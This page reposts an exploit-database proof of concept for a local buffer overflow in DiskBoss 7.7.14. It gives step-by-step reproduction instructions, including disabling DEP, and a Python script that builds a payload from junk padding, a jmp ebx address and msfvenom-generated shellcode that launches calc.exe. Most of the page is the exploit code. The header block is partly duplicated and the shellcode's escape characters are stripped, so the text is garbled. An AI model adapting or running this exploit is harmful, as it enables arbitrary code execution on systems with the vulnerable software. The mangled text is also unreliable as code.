DiskBoss 7.7.14 Local Buffer Overflow

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 289

# Exploit Title: DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)
# Vendor Homepage: https://www.diskboss.com/
# Software Link Download: https://github.com/x00x00x00 # Exploit Title: DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)
# Vendor Homepage: https://www.diskboss.com/
# Software Link Download: https://github.com/x00x00x00x00/diskboss_7.7.14/raw/master/diskboss_setup_v7.7.14.exe
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-04-01
# Vulnerable Software: DiskBoss
# Version: 7.7.14
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)

#Steps to Produce the Crash:

# 1.- Run python code: DiskbossLCE.py
# 2.- Copy content to clipboard
# 3.- Turn off DEP for diskbsg.exe
# 4.- Open "diskboss.exe" (diskbsg.exe)
# 5.- Go to "Command" > Search Files
# 6.- Click on second + icon (located at right side of "Search Disks, Directories and Network Shares")
# 7.- Click on " Add Input Directory"
# 8.- Paste ClipBoard into the "Directory" field
# 9.- Click on OK
# 10.- Calc.exe runs

#################################################################################################################################################

#Python "DiskbossLCE.py" Code:

f = open("DiskbossLCE.txt", "w")

# Message= 0x650EA4CA : jmp ebx | [QtGui4.dll] (C:Program FilesDiskBossinQtGui4.dll)

jmpebx = "xCAxA4x0Ex65"

# msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed BufferRegister=EBX -f python -b "x0ax0dx2fx5cx00"

buf = ""
buf += "x53x59x49x49x49x49x49x49x49x49x49x49x49"
buf += "x49x49x49x49x49x37x51x5ax6ax41x58x50x30"
buf += "x41x30x41x6bx41x41x51x32x41x42x32x42x42"
buf += "x30x42x42x41x42x58x50x38x41x42x75x4ax49"
buf += "x79x6cx79x78x4ex62x73x30x63x30x67x70x73"
buf += "x50x4fx79x48x65x56x51x59x50x31x74x6cx4b"
buf += "x30x50x50x30x4cx4bx51x42x74x4cx6ex6bx51"
buf += "x42x74x54x4cx4bx44x32x77x58x44x4fx4cx77"
buf += "x70x4ax55x76x44x71x69x6fx4cx6cx45x6cx53"
buf += "x51x73x4cx55x52x74x6cx31x30x49x51x4ax6f"
buf += "x34x4dx43x31x7ax67x69x72x6cx32x72x72x71"
buf += "x47x6cx4bx42x72x54x50x6cx4bx70x4ax65x6c"
buf += "x4cx4bx70x4cx64x51x62x58x39x73x51x58x67"
buf += "x71x38x51x66x31x4cx4bx31x49x31x30x33x31"
buf += "x78x53x4cx4bx31x59x44x58x49x73x65x6ax51"
buf += "x59x6ex6bx30x34x4ex6bx73x31x58x56x56x51"
buf += "x4bx4fx6cx6cx5ax61x5ax6fx34x4dx65x51x58"
buf += "x47x35x68x4dx30x30x75x58x76x55x53x31x6d"
buf += "x49x68x45x6bx43x4dx74x64x32x55x4bx54x42"
buf += "x78x6cx4bx51x48x46x44x57x71x48x53x62x46"
buf += "x4ex6bx46x6cx50x4bx4cx4bx73x68x75x4cx43"
buf += "x31x79x43x4ex6bx36x64x6cx4bx45x51x6ex30"
buf += "x4ex69x30x44x56x44x57x54x51x4bx61x4bx73"
buf += "x51x51x49x50x5ax50x51x4bx4fx6bx50x33x6f"
buf += "x33x6fx72x7ax6cx4bx42x32x78x6bx4ex6dx31"
buf += "x4dx50x6ax56x61x6ex6dx4bx35x38x32x43x30"
buf += "x47x70x35x50x42x70x62x48x36x51x4ex6bx32"
buf += "x4fx6dx57x49x6fx4ex35x6fx4bx7ax50x4dx65"
buf += "x6cx62x32x76x71x78x6cx66x6ex75x4fx4dx6f"
buf += "x6dx4bx4fx5ax75x65x6cx46x66x33x4cx66x6a"
buf += "x6bx30x4bx4bx4dx30x53x45x34x45x4fx4bx53"
buf += "x77x64x53x64x32x30x6fx42x4ax43x30x50x53"
buf += "x59x6fx78x55x75x33x51x71x72x4cx73x53x36"
buf += "x4ex55x35x74x38x71x75x47x70x41x41"

junk1 = "A" * 4096
junk2 = "C" * 1196

payload= junk1 + jmpebx + junk2 + buf

f.write(payload)
f.close()